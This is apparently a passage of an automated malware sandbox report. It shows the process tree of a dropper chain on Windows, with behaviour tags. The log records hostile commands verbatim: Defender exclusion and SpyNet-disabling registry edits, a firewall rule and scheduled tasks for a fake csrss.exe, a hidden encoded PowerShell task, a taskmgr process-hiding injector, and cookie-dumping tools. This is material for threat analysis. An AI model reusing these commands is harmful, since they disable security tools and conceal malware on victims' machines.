- Program crash
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 660
3⤵
- Program crash
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 728
3⤵
- Program crash
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 736
3⤵
- Program crash
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 748
3⤵
- Program crash
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 864
3⤵
- Program crash
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 744
3⤵
- Program crash
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 888
3⤵
- Program crash
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 904
3⤵
- Program crash
PID:484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 864
3⤵
- Program crash
PID:3672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 868
3⤵
- Program crash
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 928
3⤵
- Program crash
PID:804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 708
3⤵
- Program crash
PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 856
3⤵
- Program crash
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 792
3⤵
- Program crash
PID:768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 852
3⤵
- Program crash
PID:2428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 864
3⤵
- Program crash
PID:3744

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 292
4⤵
- Program crash
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 296
4⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 296
4⤵
- Program crash
PID:932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 608
4⤵
- Program crash
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 668
4⤵
- Program crash
PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 684
4⤵
- Program crash
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 696
4⤵
- Program crash
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 700
4⤵
- Program crash
PID:2684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 724
4⤵
- Program crash
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 668
4⤵
- Program crash
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 712
4⤵
- Program crash
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 848
4⤵
- Program crash
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 824
4⤵
- Program crash
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 848
4⤵
- Program crash
PID:404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 728
4⤵
- Program crash
PID:3020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 824
4⤵
- Program crash
PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:1956

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 328
5⤵
- Program crash
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 332
5⤵
- Program crash
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 332
5⤵
- Program crash
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 660
5⤵
- Program crash
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 660
5⤵
- Program crash
PID:3228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 660
5⤵
- Program crash
PID:3312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 732
5⤵
- Program crash
PID:3672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 740
5⤵
- Program crash
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 756
5⤵
- Program crash
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 712
5⤵
- Program crash
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 868
5⤵
- Program crash
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 856
5⤵
- Program crash
PID:4788

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 856
5⤵
- Program crash
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 900
5⤵
- Program crash
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 936
5⤵
- Program crash
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 936
5⤵
- Program crash
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 920
5⤵
- Program crash
PID:3176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 928
5⤵
- Program crash
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 948
5⤵
- Program crash
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 920
5⤵
- Program crash
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 964
5⤵
- Program crash
PID:4292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 892
5⤵
- Program crash
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 988
5⤵
- Program crash
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 984
5⤵
- Program crash
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 1060
5⤵
- Program crash
PID:4648

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 1132
5⤵
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 1152
5⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:4860

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2244

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:3036

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4012

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4720

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1336

C:\Users\Admin\Pictures\Adobe Films\xeOr2IwkN6H_CsyE9rnxIde9.exe
"C:\Users\Admin\Pictures\Adobe Films\xeOr2IwkN6H_CsyE9rnxIde9.exe"
3⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\Pictures\Adobe Films\577ozCtS1we3ETR2TTV7uJro.exe
"C:\Users\Admin\Pictures\Adobe Films\577ozCtS1we3ETR2TTV7uJro.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:1284

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4824

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4168

C:\Users\Admin\Documents\OJ3gHl_HvK3bh4QO7iQQoEi8.exe
"C:\Users\Admin\Documents\OJ3gHl_HvK3bh4QO7iQQoEi8.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5096

C:\Users\Admin\Pictures\Adobe Films\EsZV69eNw2aeJEDmXf9rFLO5.exe
"C:\Users\Admin\Pictures\Adobe Films\EsZV69eNw2aeJEDmXf9rFLO5.exe"
5⤵
- Executes dropped EXE
PID:668

C:\Users\Admin\Pictures\Adobe Films\Lfd3pjbM4UpOAI4yFoSv8bbQ.exe
"C:\Users\Admin\Pictures\Adobe Films\Lfd3pjbM4UpOAI4yFoSv8bbQ.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1200

C:\Users\Admin\Pictures\Adobe Films\VVj8QUU2oOkclF9IV_D53J7E.exe
"C:\Users\Admin\Pictures\Adobe Films\VVj8QUU2oOkclF9IV_D53J7E.exe"
5⤵
- Executes dropped EXE
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 616
6⤵
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 624
6⤵
PID:5236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 652
6⤵
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 800
6⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 832
6⤵
PID:3048

C:\Users\Admin\Pictures\Adobe Films\EIBcenHYIk6WJIq8QtLD4EXP.exe
"C:\Users\Admin\Pictures\Adobe Films\EIBcenHYIk6WJIq8QtLD4EXP.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3156

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:1912

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:5140

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
8⤵
PID:5428

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
9⤵
PID:5684

C:\Users\Admin\Pictures\Adobe Films\YuAk7CKjDMCJamg82DPNXXzN.exe
"C:\Users\Admin\Pictures\Adobe Films\YuAk7CKjDMCJamg82DPNXXzN.exe"
5⤵
PID:1412

C:\Users\Admin\AppData\Local\Temp\7zSCE55.tmp\Install.exe
.\Install.exe
6⤵
PID:1896

C:\Users\Admin\AppData\Local\Temp\7zSEF3B.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:5256

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:5132

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:5348

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:2184

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
10⤵
PID:5800

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:5312

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:6068

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwtcTwuCO" /SC once /ST 04:35:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:6064

C:\Users\Admin\Pictures\Adobe Films\FLJGcQUrctx9cyu7g5aYyRoZ.exe
"C:\Users\Admin\Pictures\Adobe Films\FLJGcQUrctx9cyu7g5aYyRoZ.exe"
5⤵
PID:1972

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:5164

C:\Users\Admin\AppData\Local\Temp\2HJ5E.exe
"C:\Users\Admin\AppData\Local\Temp\2HJ5E.exe"
7⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\IF0BA.exe
"C:\Users\Admin\AppData\Local\Temp\IF0BA.exe"
7⤵
PID:424

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
8⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\72LEBKF7AJMK6K7.exe
https://iplogger.org/1OAvJ
7⤵
PID:5772

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\ae12ad53-c071-4fa7-ad84-ccd6cd20a27f.exe
"C:\Users\Admin\AppData\Local\Temp\ae12ad53-c071-4fa7-ad84-ccd6cd20a27f.exe"
7⤵
PID:1780

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
6⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\fchen.exe
"C:\Users\Admin\AppData\Local\Temp\fchen.exe"
6⤵
PID:5588

C:\Users\Admin\AppData\Local\Temp\fchen.exe
"C:\Users\Admin\AppData\Local\Temp\fchen.exe" -h
7⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
6⤵
PID:5660

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:2164

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:5188

C:\Users\Admin\AppData\Local\Temp\bcleaner.exe
"C:\Users\Admin\AppData\Local\Temp\bcleaner.exe"
6⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:2352

C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe
"C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe"
6⤵
PID:5780

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\is-L7V2F.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L7V2F.tmp\setup.tmp" /SL5="$20262,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:2988

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
8⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\is-PJRN7.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PJRN7.tmp\setup.tmp" /SL5="$20376,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
9⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
6⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
6⤵
PID:5172

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
6⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
6⤵
PID:2596

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
6⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
6⤵
PID:5924

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
6⤵
PID:2132

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2132 -s 1636
7⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
6⤵
PID:2036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2036 -s 1688
7⤵
PID:5856

C:\Users\Admin\Pictures\Adobe Films\SgX1XbXgWUaO_2LalK20rA6N.exe
"C:\Users\Admin\Pictures\Adobe Films\SgX1XbXgWUaO_2LalK20rA6N.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:3612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im SgX1XbXgWUaO_2LalK20rA6N.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\SgX1XbXgWUaO_2LalK20rA6N.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:624

C:\Windows\SysWOW64\taskkill.exe
taskkill /im SgX1XbXgWUaO_2LalK20rA6N.exe /f
5⤵
- Kills process with taskkill
PID:424

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:5980

C:\Users\Admin\Pictures\Adobe Films\DNDlYi5RpG9RGgDXfJH56bSJ.exe
"C:\Users\Admin\Pictures\Adobe Films\DNDlYi5RpG9RGgDXfJH56bSJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4392

C:\Users\Admin\Pictures\Adobe Films\8Q3zkbnXoy6BIlQTdaVfP3Q4.exe
"C:\Users\Admin\Pictures\Adobe Films\8Q3zkbnXoy6BIlQTdaVfP3Q4.exe"
3⤵
- Executes dropped EXE
PID:956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 624
4⤵
- Program crash
PID:1764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 632
4⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 644
4⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 804
4⤵
PID:2988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 880
4⤵
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 1256
4⤵
PID:5944

C:\Users\Admin\Pictures\Adobe Films\KCH3v59TQ6iq7ORLzU0vg3GI.exe
"C:\Users\Admin\Pictures\Adobe Films\KCH3v59TQ6iq7ORLzU0vg3GI.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3528

C:\Users\Admin\AppData\Local\Temp\7zS3CB3.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4532

C:\Users\Admin\AppData\Local\Temp\7zS5898.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5064

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:5512

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:2056

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:5816

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:6036

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:5436

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:6048

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:5864

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPDEIkqiV" /SC once /ST 01:38:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:5020

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPDEIkqiV"
6⤵
PID:1996

